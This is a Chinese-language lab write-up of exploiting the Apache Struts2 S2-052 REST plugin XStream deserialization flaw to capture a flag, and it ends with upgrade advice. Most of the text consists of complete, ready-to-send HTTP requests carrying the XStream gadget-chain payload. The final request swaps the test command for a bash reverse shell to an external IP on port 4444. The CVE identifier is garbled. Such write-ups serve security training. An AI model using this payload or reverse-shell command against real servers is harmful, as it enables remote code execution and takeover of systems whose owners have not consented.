漏洞介绍
名称: struts2-052 远程代码执行 (CVE--9805)
描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。REST plugin是其中的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行严格的过滤导致远程代码执行。
解题过程
1.打开靶场
2.抓包
3.在burpsuite中改包进行重放,payload如下。
POST /orders HTTP/1.1Host: 192.168.0.23:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/0101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Referer: http://192.168.0.23:8080/orders/3/editCookie: JSESSIONID=038C79EF8BD97CF8A5F02024C3EC34EDConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/xmlContent-Length: 1673<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command><string>/usr/bin/touch</string> <string>/tmp/shell.txt</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map>
上面的数据包中执行命令的地方在这里:
<command><string>/usr/bin/touch</string> <string>/tmp/shell.txt</string> </command>
执行的是创建shell.txt文件的命令,但我们需要的是获取flag,于是修改pyload,改成反弹shell的命令:
在远程命令执行过程中,由于务器不识别&这个符号,需要编码,将&换成 &,如下所示
<command><string>bash</string><string>-c</string><string>bash -i >& /dev/tcp/82.156.16.168/4444 0>&1</string></command>
4.服务器终端打开监听
5.burp中发送构造好的数据包,让目标服务器执行反弹shell命令
我最终发送的数据包为:
POST /orders HTTP/1.1Host: 118.193.36.37:40649User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/0101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Referer: http://192.168.0.23:8080/orders/3/editCookie: JSESSIONID=038C79EF8BD97CF8A5F02024C3EC34EDConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/xmlContent-Length: 1717<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command><string>bash</string><string>-c</string><string>bash -i >& /dev/tcp/82.156.16.168/4444 0>&1</string></command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map>
6.成功反弹shell,执行ls /tmp命令获取flag。
修复建议
升级Apache struts 至 2.5.13 版本
如果系统没有使用Struts REST插件,那么可以直接删除Struts REST插件,或者在配置文件中加入如下代码,限制服务端文件的扩展名
<constant name=“struts.action.extension” value=“xhtml,json” />
![[vulfocus漏洞复现]thinkcmf 代码执行漏洞复现 (CVE--7580)phpinfo();ThinkC](https://900zi.500zi.com/uploadfile/img/15/824/1d9d8b2b9785d0ee08e8bafabc2a0c88.jpg)
